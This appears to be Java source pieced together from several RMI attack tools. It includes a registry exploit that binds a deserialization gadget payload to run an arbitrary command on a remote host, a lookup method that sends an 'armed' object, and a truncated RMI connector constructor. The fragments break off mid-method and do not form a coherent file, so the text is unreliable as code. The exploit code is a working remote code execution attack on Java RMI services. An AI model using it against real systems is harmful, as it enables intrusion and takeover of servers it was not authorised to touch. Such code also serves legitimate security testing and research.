public static void main(final String[] args) throws Exception {
	final String host = args[0];
	final int port = Integer.parseInt(args[1]);
	final String command = args[3];
	Registry registry = LocateRegistry.getRegistry(host, port);
	final String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
	final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);

	// test RMI registry connection and upgrade to SSL connection on fail
	try {
		registry.list();
	} catch(ConnectIOException ex) {
		registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
	}

	// ensure payload doesn't detonate during construction or deserialization
	exploit(registry, payloadClass, command);
}

public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
           Object payload = payloadObj.getObject(command);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
			e.printStackTrace();
		}
		Utils.releasePayload(payloadObj, payload);
		return null;
	}});
}

/**
 * Generic JRMP client
 * 
 * Pretty much the same thing as {@link RMIRegistryExploit} but 
 * - targeting the remote DGC (Distributed Garbage Collection, always there if there is a listener)
 * - not deserializing anything (so you don't get yourself exploited ;))
 * 
 * @author mbechler
 *
 */

public static Remote lookup(Registry registry, Object obj)
            throws Exception {
        RemoteRef ref = (RemoteRef) ReflectionHelper.getFieldValue(registry, "ref");
        long interfaceHash = (long) ReflectionHelper.getFieldValue(registry, "interfaceHash");
        java.rmi.server.Operation[] operations = (Operation[]) ReflectionHelper.getFieldValue(registry, "operations");
        java.rmi.server.RemoteCall call = ref.newCall((java.rmi.server.RemoteObject) registry, operations, 2, interfaceHash);
        try {
            try {
                java.io.ObjectOutput out = call.getOutputStream();
                //反射修改enableReplace
                ReflectionHelper.setFieldValue(out, "enableReplace", false);
                out.writeObject(obj); // arm obj
            } catch (java.io.IOException e) {
                throw new java.rmi.MarshalException("error marshalling arguments", e);
            }
            ref.invoke(call);
            return null;
        } catch (RuntimeException | RemoteException | NotBoundException e) {

public RMIConnector(String host, int port, String remoteName, List<String> signatures, boolean allowUnsafe, boolean isActivationServer) {
        try {
            this.host = host;
            this.allowUnsafe = allowUnsafe;
            this.signatures = signatures;
            this.isActivationServer = isActivationServer;
            String[] regNames = null;
            isSSL = false;

            try {
                // Attempt a standard cleartext connection
                this.registry = LocateRegistry.getRegistry(host, port);
                regNames = registry.list();